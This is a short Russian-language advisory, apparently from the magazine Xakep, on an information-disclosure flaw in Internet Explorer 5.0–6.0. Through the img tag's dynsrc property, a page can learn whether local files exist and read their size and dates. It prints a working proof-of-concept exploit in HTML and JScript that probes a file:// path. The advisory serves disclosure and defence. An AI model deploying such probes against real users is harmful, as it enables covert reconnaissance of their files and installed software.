Хакер #305. Многошаговые SQL-инъекции
Тэг <img> обычно используется для
вставки изображения в HTML документе. Однако тег также позволяет представлять другие медийные типы, типа VRML, AVI, MPEG, и т.д. Эта
возможность существует благодаря свойству
dynsrc.
Найденная уязвимость позволяет раскрыть чувствительную информацию о файлах
(типа существования файлов, их размера, дата модификации, и т.д.), постоянно находящихся на локальном диске.
Злонамеренный нападающий может использовать эту ошибку
для того, чтобы обнаружить файлы или
определить, имеет ли пользователь определенные программы (и даже определенные версии, согласно размеру), и т.д.
Уязвимость найдена в Internet Explorer 5.0-6.0.
Эксплоит
<img dynsrc="file://путь к файлу" id="oFile">
<script language="jscript" defer>
setTimeout(
function () {
alert(
oFile.fileSize>-1 ?
"File exists!\n\n"+
"Size: "+oFile.fileSize+" bytes.\n"+
"Created: "+oFile.fileCreatedDate+".\n"+
"Modified: "+oFile.fileModifiedDate+".\n"+
"Updated: "+oFile.fileUpdatedDate+"."
:
"File does not exist."
);
},
250
);
</script>